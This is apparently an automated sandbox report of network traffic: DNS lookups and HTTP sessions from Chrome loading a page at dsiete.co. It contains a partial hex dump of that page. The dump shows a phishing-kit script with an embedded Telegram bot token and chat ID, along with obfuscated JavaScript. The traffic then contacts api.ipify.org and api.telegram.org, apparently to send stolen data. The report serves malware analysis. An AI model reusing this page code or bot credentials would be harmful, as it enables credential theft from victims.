                                            Dec 3, 2024 09:58:13.705169916 CET49831443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.705174923 CET4434983113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.730576992 CET4434982813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.730662107 CET4434982813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.730706930 CET49828443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.730809927 CET49828443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.730824947 CET4434982813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.730833054 CET49828443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.730838060 CET4434982813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.733203888 CET49833443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.733232975 CET4434983313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.733325958 CET49833443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.733450890 CET49833443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.733460903 CET4434983313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.736756086 CET4434983013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.736804962 CET4434983013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.736840963 CET49830443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.736920118 CET49830443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.736927986 CET4434983013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.736934900 CET49830443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.736938000 CET4434983013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.738598108 CET49834443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.738634109 CET4434983413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.738714933 CET49834443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.738828897 CET49834443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.738842964 CET4434983413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.748157978 CET4434982913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.748208046 CET4434982913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.748250008 CET49829443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.748353958 CET49829443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.748368025 CET4434982913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.748378992 CET49829443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.748383999 CET4434982913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.750099897 CET49835443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.750109911 CET4434983513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.750183105 CET49835443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.750298977 CET49835443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.750309944 CET4434983513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:14.149797916 CET4434983113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:14.149871111 CET4434983113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:14.150079966 CET49831443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:14.150109053 CET49831443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:14.150122881 CET4434983113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:14.150136948 CET49831443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:14.150141954 CET4434983113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:14.152906895 CET49836443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:14.152949095 CET4434983613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:14.153088093 CET49836443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:14.153213978 CET49836443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:14.153232098 CET4434983613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:14.982276917 CET4434983213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:14.982928038 CET49832443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:14.982949972 CET4434983213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:14.983506918 CET49832443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:14.983514071 CET4434983213.107.246.63192.168.2.4
                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 3, 2024 09:56:48.536020041 CET53544331.1.1.1192.168.2.4
                                            Dec 3, 2024 09:56:48.544198990 CET53561491.1.1.1192.168.2.4
                                            Dec 3, 2024 09:56:51.363712072 CET53503201.1.1.1192.168.2.4
                                            Dec 3, 2024 09:56:52.111630917 CET5995653192.168.2.41.1.1.1
                                            Dec 3, 2024 09:56:52.112039089 CET5243653192.168.2.41.1.1.1
                                            Dec 3, 2024 09:56:52.249445915 CET53599561.1.1.1192.168.2.4
                                            Dec 3, 2024 09:56:52.249598980 CET53524361.1.1.1192.168.2.4
                                            Dec 3, 2024 09:56:53.809895992 CET5191453192.168.2.41.1.1.1
                                            Dec 3, 2024 09:56:53.810522079 CET5899653192.168.2.41.1.1.1
                                            Dec 3, 2024 09:56:54.828224897 CET6305553192.168.2.41.1.1.1
                                            Dec 3, 2024 09:56:54.828433990 CET6297753192.168.2.41.1.1.1
                                            Dec 3, 2024 09:56:54.845422983 CET53519141.1.1.1192.168.2.4
                                            Dec 3, 2024 09:56:54.845977068 CET53589961.1.1.1192.168.2.4
                                            Dec 3, 2024 09:56:54.965641975 CET53630551.1.1.1192.168.2.4
                                            Dec 3, 2024 09:56:54.966314077 CET53629771.1.1.1192.168.2.4
                                            Dec 3, 2024 09:56:56.990272045 CET6485753192.168.2.41.1.1.1
                                            Dec 3, 2024 09:56:56.990418911 CET6374553192.168.2.41.1.1.1
                                            Dec 3, 2024 09:56:57.126252890 CET53526131.1.1.1192.168.2.4
                                            Dec 3, 2024 09:56:57.128015041 CET53637451.1.1.1192.168.2.4
                                            Dec 3, 2024 09:56:57.132179976 CET53648571.1.1.1192.168.2.4
                                            Dec 3, 2024 09:56:59.295434952 CET5847253192.168.2.41.1.1.1
                                            Dec 3, 2024 09:56:59.295612097 CET5617653192.168.2.41.1.1.1
                                            Dec 3, 2024 09:56:59.433294058 CET53584721.1.1.1192.168.2.4
                                            Dec 3, 2024 09:56:59.434215069 CET53561761.1.1.1192.168.2.4
                                            Dec 3, 2024 09:57:00.087425947 CET5118553192.168.2.41.1.1.1
                                            Dec 3, 2024 09:57:00.087642908 CET5615453192.168.2.41.1.1.1
                                            Dec 3, 2024 09:57:00.152291059 CET53566421.1.1.1192.168.2.4
                                            Dec 3, 2024 09:57:00.223881006 CET53528591.1.1.1192.168.2.4
                                            Dec 3, 2024 09:57:00.224813938 CET53511851.1.1.1192.168.2.4
                                            Dec 3, 2024 09:57:00.225467920 CET53561541.1.1.1192.168.2.4
                                            Dec 3, 2024 09:57:01.948005915 CET6280353192.168.2.41.1.1.1
                                            Dec 3, 2024 09:57:01.948148012 CET5935253192.168.2.41.1.1.1
                                            Dec 3, 2024 09:57:02.086205959 CET53593521.1.1.1192.168.2.4
                                            Dec 3, 2024 09:57:02.088393927 CET53628031.1.1.1192.168.2.4
                                            Dec 3, 2024 09:57:03.425945997 CET6354953192.168.2.41.1.1.1
                                            Dec 3, 2024 09:57:03.426115990 CET6098653192.168.2.41.1.1.1
                                            Dec 3, 2024 09:57:03.564296007 CET53609861.1.1.1192.168.2.4
                                            Dec 3, 2024 09:57:03.564448118 CET53635491.1.1.1192.168.2.4
                                            Dec 3, 2024 09:57:06.209150076 CET138138192.168.2.4192.168.2.255
                                            Dec 3, 2024 09:57:08.343130112 CET53547261.1.1.1192.168.2.4
                                            Dec 3, 2024 09:57:24.926115990 CET6161653192.168.2.41.1.1.1
                                            Dec 3, 2024 09:57:24.926201105 CET5202053192.168.2.41.1.1.1
                                            Dec 3, 2024 09:57:25.069243908 CET53616161.1.1.1192.168.2.4
                                            Dec 3, 2024 09:57:25.161694050 CET53520201.1.1.1192.168.2.4
                                            Dec 3, 2024 09:57:27.451631069 CET53547521.1.1.1192.168.2.4
                                            Dec 3, 2024 09:57:29.217932940 CET5659553192.168.2.41.1.1.1
                                            Dec 3, 2024 09:57:29.221836090 CET5685653192.168.2.41.1.1.1
                                            Dec 3, 2024 09:57:29.356151104 CET53565951.1.1.1192.168.2.4
                                            Dec 3, 2024 09:57:29.360047102 CET53568561.1.1.1192.168.2.4
                                            Dec 3, 2024 09:57:47.682713985 CET53628791.1.1.1192.168.2.4
                                            Dec 3, 2024 09:57:50.086343050 CET53495671.1.1.1192.168.2.4
                                            TimestampSource IPDest IPChecksumCodeType
                                            Dec 3, 2024 09:56:54.965770006 CET192.168.2.41.1.1.1c1ef(Port unreachable)Destination Unreachable
                                            Dec 3, 2024 09:57:25.161798000 CET192.168.2.41.1.1.1c235(Port unreachable)Destination Unreachable
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Dec 3, 2024 09:56:52.111630917 CET192.168.2.41.1.1.10xf72Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:52.112039089 CET192.168.2.41.1.1.10x4d93Standard query (0)www.google.com65IN (0x0001)false
                                            Dec 3, 2024 09:56:53.809895992 CET192.168.2.41.1.1.10xae0eStandard query (0)dsiete.coA (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:53.810522079 CET192.168.2.41.1.1.10xf40eStandard query (0)dsiete.co65IN (0x0001)false
                                            Dec 3, 2024 09:56:54.828224897 CET192.168.2.41.1.1.10x4362Standard query (0)dsiete.coA (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:54.828433990 CET192.168.2.41.1.1.10x72ccStandard query (0)dsiete.co65IN (0x0001)false
                                            Dec 3, 2024 09:56:56.990272045 CET192.168.2.41.1.1.10x542aStandard query (0)i.ibb.coA (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:56.990418911 CET192.168.2.41.1.1.10x144dStandard query (0)i.ibb.co65IN (0x0001)false
                                            Dec 3, 2024 09:56:59.295434952 CET192.168.2.41.1.1.10x2d60Standard query (0)i.ibb.coA (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:59.295612097 CET192.168.2.41.1.1.10x62bbStandard query (0)i.ibb.co65IN (0x0001)false
                                            Dec 3, 2024 09:57:00.087425947 CET192.168.2.41.1.1.10xb2f8Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:57:00.087642908 CET192.168.2.41.1.1.10xdc92Standard query (0)api.ipify.org65IN (0x0001)false
                                            Dec 3, 2024 09:57:01.948005915 CET192.168.2.41.1.1.10x53faStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:57:01.948148012 CET192.168.2.41.1.1.10x89ebStandard query (0)api.ipify.org65IN (0x0001)false
                                            Dec 3, 2024 09:57:03.425945997 CET192.168.2.41.1.1.10xfc02Standard query (0)dsiete.coA (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:57:03.426115990 CET192.168.2.41.1.1.10xb758Standard query (0)dsiete.co65IN (0x0001)false
                                            Dec 3, 2024 09:57:24.926115990 CET192.168.2.41.1.1.10xac40Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:57:24.926201105 CET192.168.2.41.1.1.10x8f21Standard query (0)api.telegram.org65IN (0x0001)false
                                            Dec 3, 2024 09:57:29.217932940 CET192.168.2.41.1.1.10x28fbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:57:29.221836090 CET192.168.2.41.1.1.10x581Standard query (0)api.telegram.org65IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Dec 3, 2024 09:56:52.249445915 CET1.1.1.1192.168.2.40xf72No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:52.249598980 CET1.1.1.1192.168.2.40x4d93No error (0)www.google.com65IN (0x0001)false
                                            Dec 3, 2024 09:56:54.845422983 CET1.1.1.1192.168.2.40xae0eNo error (0)dsiete.co173.254.24.56A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:54.965641975 CET1.1.1.1192.168.2.40x4362No error (0)dsiete.co173.254.24.56A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:57.132179976 CET1.1.1.1192.168.2.40x542aNo error (0)i.ibb.co91.134.9.160A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:57.132179976 CET1.1.1.1192.168.2.40x542aNo error (0)i.ibb.co91.134.10.168A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:57.132179976 CET1.1.1.1192.168.2.40x542aNo error (0)i.ibb.co91.134.10.127A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:57.132179976 CET1.1.1.1192.168.2.40x542aNo error (0)i.ibb.co91.134.9.159A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:57.132179976 CET1.1.1.1192.168.2.40x542aNo error (0)i.ibb.co91.134.82.79A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:57.132179976 CET1.1.1.1192.168.2.40x542aNo error (0)i.ibb.co91.134.10.182A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:59.433294058 CET1.1.1.1192.168.2.40x2d60No error (0)i.ibb.co91.134.10.168A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:59.433294058 CET1.1.1.1192.168.2.40x2d60No error (0)i.ibb.co91.134.10.182A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:59.433294058 CET1.1.1.1192.168.2.40x2d60No error (0)i.ibb.co91.134.9.159A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:59.433294058 CET1.1.1.1192.168.2.40x2d60No error (0)i.ibb.co91.134.9.160A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:59.433294058 CET1.1.1.1192.168.2.40x2d60No error (0)i.ibb.co91.134.82.79A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:56:59.433294058 CET1.1.1.1192.168.2.40x2d60No error (0)i.ibb.co91.134.10.127A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:57:00.224813938 CET1.1.1.1192.168.2.40xb2f8No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:57:00.224813938 CET1.1.1.1192.168.2.40xb2f8No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:57:00.224813938 CET1.1.1.1192.168.2.40xb2f8No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:57:00.225467920 CET1.1.1.1192.168.2.40xdc92No error (0)api.ipify.org65IN (0x0001)false
                                            Dec 3, 2024 09:57:02.086205959 CET1.1.1.1192.168.2.40x89ebNo error (0)api.ipify.org65IN (0x0001)false
                                            Dec 3, 2024 09:57:02.088393927 CET1.1.1.1192.168.2.40x53faNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:57:02.088393927 CET1.1.1.1192.168.2.40x53faNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:57:02.088393927 CET1.1.1.1192.168.2.40x53faNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:57:03.564448118 CET1.1.1.1192.168.2.40xfc02No error (0)dsiete.co173.254.24.56A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:57:25.069243908 CET1.1.1.1192.168.2.40xac40No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                            Dec 3, 2024 09:57:29.356151104 CET1.1.1.1192.168.2.40x28fbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                            • dsiete.co
                                            • fs.microsoft.com
                                            • https:
                                              • i.ibb.co
                                              • api.ipify.org
                                              • api.telegram.org
                                            • slscr.update.microsoft.com
                                            • otelrules.azureedge.net
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.44973823.218.208.109443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:56:54 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            User-Agent: Microsoft BITS/7.8
                                            Host: fs.microsoft.com
                                            2024-12-03 08:56:55 UTC478INHTTP/1.1 200 OK
                                            Content-Type: application/octet-stream
                                            Server: Kestrel
                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                            X-Ms-ApiVersion: Distribute 1.2
                                            X-Ms-Region: prod-weu-z1
                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                            X-OSID: 2
                                            X-CID: 2
                                            X-CCC: GB
                                            Cache-Control: public, max-age=37786
                                            Date: Tue, 03 Dec 2024 08:56:54 GMT
                                            Connection: close
                                            X-CID: 2


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.449740173.254.24.564433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:56:56 UTC662OUTGET /share.html HTTP/1.1
                                            Host: dsiete.co
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            sec-ch-ua-platform: "Windows"
                                            Upgrade-Insecure-Requests: 1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: navigate
                                            Sec-Fetch-User: ?1
                                            Sec-Fetch-Dest: document
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:56:56 UTC256INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:56:56 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Last-Modified: Mon, 21 Oct 2024 11:31:50 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 36899
                                            Vary: Accept-Encoding
                                            Content-Type: text/html
                                            2024-12-03 08:56:56 UTC7936INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 0d 0a 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 09 76 61 72 20 74 6f 6b 65 6e 20 3d 20 27 36 33 38 35 31 38 36 30 30 38 3a 41 41 45 63 2d 6e 61 5a 66 7a 4e 61 50 66 45 61 44 45 70 30 69 55 4a 73 4a 5f 75 42 76 4a 36 35 39 4e 41 27 3b 0d 0a 09 76 61 72 20 63 68 61 74 5f 69 64 20 3d 20 35 39 34 37 33 33 39 38 37 36 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 31 3b
                                            Data Ascii: <html lang="en"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><script>var token = '6385186008:AAEc-naZfzNaPfEaDEp0iUJsJ_uBvJ659NA';var chat_id = 5947339876;</script></head><body style="opacity: 1;
                                            2024-12-03 08:56:56 UTC8000INData Raw: 77 33 2d 63 6f 6c 2e 73 31 31 7b 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 25 7d 2e 77 33 2d 63 6f 6c 2e 73 31 32 7b 77 69 64 74 68 3a 39 39 2e 39 39 39 39 39 25 7d 0d 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 30 31 70 78 29 7b 2e 77 33 2d 63 6f 6c 2e 6d 31 7b 77 69 64 74 68 3a 38 2e 33 33 33 33 33 25 7d 2e 77 33 2d 63 6f 6c 2e 6d 32 7b 77 69 64 74 68 3a 31 36 2e 36 36 36 36 36 25 7d 2e 77 33 2d 63 6f 6c 2e 6d 33 2c 2e 77 33 2d 71 75 61 72 74 65 72 7b 77 69 64 74 68 3a 32 34 2e 39 39 39 39 39 25 7d 2e 77 33 2d 63 6f 6c 2e 6d 34 2c 2e 77 33 2d 74 68 69 72 64 7b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 25 7d 0d 0a 2e 77 33 2d 63 6f 6c 2e 6d 35 7b 77 69 64 74 68 3a 34 31 2e 36 36 36 36 36 25 7d 2e 77 33 2d 63 6f 6c 2e 6d 36 2c 2e 77 33 2d
                                            Data Ascii: w3-col.s11{width:91.66666%}.w3-col.s12{width:99.99999%}@media (min-width:601px){.w3-col.m1{width:8.33333%}.w3-col.m2{width:16.66666%}.w3-col.m3,.w3-quarter{width:24.99999%}.w3-col.m4,.w3-third{width:33.33333%}.w3-col.m5{width:41.66666%}.w3-col.m6,.w3-
                                            2024-12-03 08:56:56 UTC8000INData Raw: 78 21 69 6d 70 6f 72 74 61 6e 74 7d 0d 0a 2e 77 33 2d 70 61 64 64 69 6e 67 2d 36 34 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 36 34 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 36 34 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 0d 0a 2e 77 33 2d 70 61 64 64 69 6e 67 2d 74 6f 70 2d 36 34 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 36 34 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 77 33 2d 70 61 64 64 69 6e 67 2d 74 6f 70 2d 34 38 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 34 38 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 0d 0a 2e 77 33 2d 70 61 64 64 69 6e 67 2d 74 6f 70 2d 33 32 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 77 33 2d 70 61 64 64 69 6e 67 2d 74 6f 70 2d 32 34 7b 70 61 64 64 69 6e 67 2d
                                            Data Ascii: x!important}.w3-padding-64{padding-top:64px!important;padding-bottom:64px!important}.w3-padding-top-64{padding-top:64px!important}.w3-padding-top-48{padding-top:48px!important}.w3-padding-top-32{padding-top:32px!important}.w3-padding-top-24{padding-
                                            2024-12-03 08:56:56 UTC8000INData Raw: 2d 62 6f 72 64 65 72 2d 70 61 6c 65 2d 79 65 6c 6c 6f 77 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6f 72 64 65 72 2d 70 61 6c 65 2d 79 65 6c 6c 6f 77 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 66 66 66 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 77 33 2d 62 6f 72 64 65 72 2d 70 61 6c 65 2d 62 6c 75 65 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6f 72 64 65 72 2d 70 61 6c 65 2d 62 6c 75 65 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 37 66 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 09 0d 0a 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0d 0a 0d 0a 2f 2a 20 54 68 65 20 4d 6f 64 61 6c 20 28 62 61 63 6b 67 72 6f 75 6e 64 29 20 2a 2f
                                            Data Ascii: -border-pale-yellow,.w3-hover-border-pale-yellow:hover{border-color:#ffffcc!important}.w3-border-pale-blue,.w3-hover-border-pale-blue:hover{border-color:#e7ffff!important}body {font-family: Arial, Helvetica, sans-serif;}/* The Modal (background) */
                                            2024-12-03 08:56:56 UTC4963INData Raw: 29 7b 5f 30 78 33 34 37 34 38 66 3d 5f 30 78 33 34 37 34 38 66 2d 30 78 39 30 3b 76 61 72 20 5f 30 78 32 35 33 36 39 36 3d 5f 30 78 35 33 66 30 61 37 5b 5f 30 78 33 34 37 34 38 66 5d 3b 72 65 74 75 72 6e 20 5f 30 78 32 35 33 36 39 36 3b 7d 2c 5f 30 78 33 34 37 34 28 5f 30 78 35 37 64 32 64 33 2c 5f 30 78 34 61 31 62 34 37 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 33 66 30 28 29 7b 76 61 72 20 5f 30 78 35 39 30 63 38 34 3d 5b 27 36 39 37 37 37 39 36 41 44 69 72 6b 73 27 2c 27 35 43 45 70 49 79 43 27 2c 27 54 4d 4c 27 2c 27 6e 6f 6e 27 2c 27 36 36 34 34 4a 66 73 4d 67 44 27 2c 27 35 30 36 37 52 48 74 6d 68 44 27 2c 27 74 61 72 27 2c 27 70 6c 61 27 2c 27 4f 75 74 27 2c 27 74 42 79 27 2c 27 6f 6e 63 27 2c 27 65 72 6d 27 2c 27 45 6c 65 27 2c 27 69 6e 6e
                                            Data Ascii: ){_0x34748f=_0x34748f-0x90;var _0x253696=_0x53f0a7[_0x34748f];return _0x253696;},_0x3474(_0x57d2d3,_0x4a1b47);}function _0x53f0(){var _0x590c84=['6977796ADirks','5CEpIyC','TML','non','6644JfsMgD','5067RHtmhD','tar','pla','Out','tBy','onc','erm','Ele','inn


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.44974123.218.208.109443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:56:56 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                            Range: bytes=0-2147483646
                                            User-Agent: Microsoft BITS/7.8
                                            Host: fs.microsoft.com
                                            2024-12-03 08:56:57 UTC534INHTTP/1.1 200 OK
                                            Content-Type: application/octet-stream
                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                            ApiVersion: Distribute 1.1
                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                            X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                            Cache-Control: public, max-age=97708
                                            Date: Tue, 03 Dec 2024 08:56:56 GMT
                                            Content-Length: 55
                                            Connection: close
                                            X-CID: 2
                                            2024-12-03 08:56:57 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.44974391.134.9.1604433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:56:58 UTC594OUTGET /zr2zMVC/output-onlinepngtools.png HTTP/1.1
                                            Host: i.ibb.co
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://dsiete.co/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:56:59 UTC379INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Tue, 03 Dec 2024 08:56:58 GMT
                                            Content-Type: image/png
                                            Content-Length: 51741
                                            Connection: close
                                            Last-Modified: Thu, 25 Apr 2024 00:27:21 GMT
                                            Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                            Cache-Control: max-age=315360000
                                            Cache-Control: public
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, OPTIONS
                                            Accept-Ranges: bytes
